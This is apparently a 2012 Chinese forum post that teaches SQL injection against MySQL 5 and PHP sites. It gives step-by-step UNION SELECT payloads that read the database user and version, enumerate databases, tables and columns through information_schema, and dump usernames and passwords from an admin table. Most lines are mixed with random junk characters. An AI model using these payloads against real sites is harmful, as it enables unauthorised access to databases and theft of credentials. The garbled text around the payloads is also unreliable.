' K- M" `2 \- v' r. E$ P% E3 B教程内容:Mysql 5+php 注入
8 S) k8 m3 U* x3 [: Y _. G
) w0 y; E3 r6 [8 l
' r4 m9 h; g4 \/ e" G |
& V0 q: K% ?/ R( \# ]+ e一.查看MYSQL基本信息(库名,版本,用户)
2 I* O1 x: u( ]" X% Q5 E& `4 z0 t: o7 T8 s
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
* e P9 r& D; P0 x# s
6 o$ Y1 B' f' Y4 S2 \) o二.查数据库1 \' B5 m& f" c# [% _8 S( e# ?7 D
$ \; O u6 }2 q, d
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*& e: f& M q8 x9 J! ~# [! o \1 o$ _
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
. W" ^& O) N0 E8 r8 Q" `( f1 \+ \0 Y3 @1 a2 F0 u
三.暴表' D1 o0 c) W. X3 s+ _. n7 w9 |, }
1 g" `- m& Z" J2 V- @* vand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
. R$ V" T _0 `6 [/ E
) k u9 u- f& l( | ]% }( |limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
+ c. y1 t. Y& k% M
6 e: o4 b! C/ V- x+ t四.暴字段# ?1 }8 B( s/ ~- z# v5 F
4 f3 l" ^6 Q0 Q
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
J) T! q7 `- ?$ F4 Y5 t
6 ^' h7 k/ _0 v6 J9 ?3 ~4 x6 mlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
' P4 S4 O1 y! ]% h0 s: o8 V) T, \* m- a$ L6 {. Q9 ^4 [* U" S) C
五.暴数据
8 I$ v( S% b2 [' t; _! o8 Y; g8 G/ }7 O) v
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
2 p5 x: y! K' R+ U
2 q, l+ X: v7 U2 e) n+ C2 H; I6 Z$ D3 X, P5 \
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
% O2 ^ }. \: W: i7 [ |
发表于 2012-9-13 16:27:53
收藏
支持
反对